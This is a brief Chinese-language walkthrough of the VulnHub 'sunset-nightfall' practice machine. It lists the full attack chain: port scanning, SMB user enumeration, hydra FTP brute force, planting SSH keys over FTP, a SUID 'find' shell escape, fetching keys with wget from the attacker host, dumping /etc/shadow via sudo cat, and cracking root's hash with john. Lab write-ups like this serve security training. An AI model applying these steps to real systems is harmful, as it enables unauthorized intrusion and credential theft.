貓寧~~~
地址:https://www.vulnhub.com/entry/sunset-nightfall,355/
重視工具和思路。
nmap 192.168.43.0/24
靶機IP 192.168.43.14
nmap -A -p1-65535 192.168.43.14
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
訪問http://192.168.43.14/,顯示apache2 debian頁面
enum4linux 192.168.43.14
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
海外常見密碼前10萬
https://www.ncsc.gov.uk/static-assets/documents/PwnedPasswordsTop100k.txt
hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/top1000.txt -f 192.168.43.14 ftp
賬號密碼matt/cheese
ftp://192.168.43.14/,登錄,目錄是/home/matt
攻擊機上輸入ssh-keygen
生成/root/.ssh/id_rsa.pub,/root/.ssh/id_rsa
cat id_rsa.pub > authorized_keys
ftp 192.168.43.14
mkdir .ssh
cd .ssh
put id_rsa.pub
put authorized_keys
put id_rsa
ssh [email protected],成功登錄
查找suid權限的
find / -perm -u=s -type f 2>/dev/null
ls -al /scripts/find
cat /etc/passwd
發現nightfall用戶
cd /home/nightfall
cat user.txt
97fb7140ca325ed96f67be3c9e30083d
獲取nightfall權限
/scripts/find . -exec "/bin/sh" -p \;
sudo -l,失敗
python3 -m http.server 8080
cd /home/nightfall
la -al
cd .ssh
wget http://192.168.43.154:8080/authorized_keys
ssh [email protected],獲得nightfall權限
sudo -l
(root) NOPASSWD: /usr/bin/cat
sudo /usr/bin/cat /etc/shadow
複製root第二個字段,命名爲mima.txt
john /root/Desktop/mima.txt,破解爲miguel2
su root,輸入密碼就行
cat root_super_secret_flag.txt,家目錄
flag{9a5b21fc6719fe33004d66b703d70a39}